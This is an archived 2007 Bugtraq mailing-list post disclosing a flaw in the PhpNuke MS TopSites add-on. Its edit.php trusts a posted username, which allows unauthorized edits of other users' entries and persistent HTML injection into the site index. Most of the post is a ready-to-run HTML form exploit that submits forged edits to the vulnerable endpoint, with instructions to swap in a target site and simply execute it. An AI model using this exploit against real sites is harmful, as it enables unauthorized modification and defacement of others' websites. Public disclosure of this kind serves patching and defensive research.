lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071106200517.5438.qmail@securityfocus.com>
Date: 6 Nov 2007 20:05:17 -0000
From: Guns@...0.com.ar
To: bugtraq@...urityfocus.com
Subject: PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection

<!--
- Author  : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar    
-
- Product : Php Nuke add-on MS TopSites 
-
- Website : http://phpnuke.org/ 
-
- Download: http://www.weblord.it/downloads/nuke65/addons/MS_TopSites_ITA.zip
-
- Problem : Edit Exploit And Html Injection
-
- Summary: The var $uname in the sql_query in edit.php is not bugged but it's simply taked with $_POST['uname'], 
let us change our "user", and modify as another one what we want. 
Sometimes we can do either permanent html injections in "title" that appears in index. In these cases we 
are able to change the index content of the site. :D-
-
-->

Html Exploit:

<!-- You have to edit the [Site] with the target site. In particular circumstaces you have to edit some input.-->

<!-- You Must Not Have an userid and be logged in. Just execute This =) -->

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value='' name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="mail@....com" name="email"> Email<br /> 
<input size="92" type="text" value='' name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br /> 
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br /> 
<input type="submit" value="submit"><br />
</body></form>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ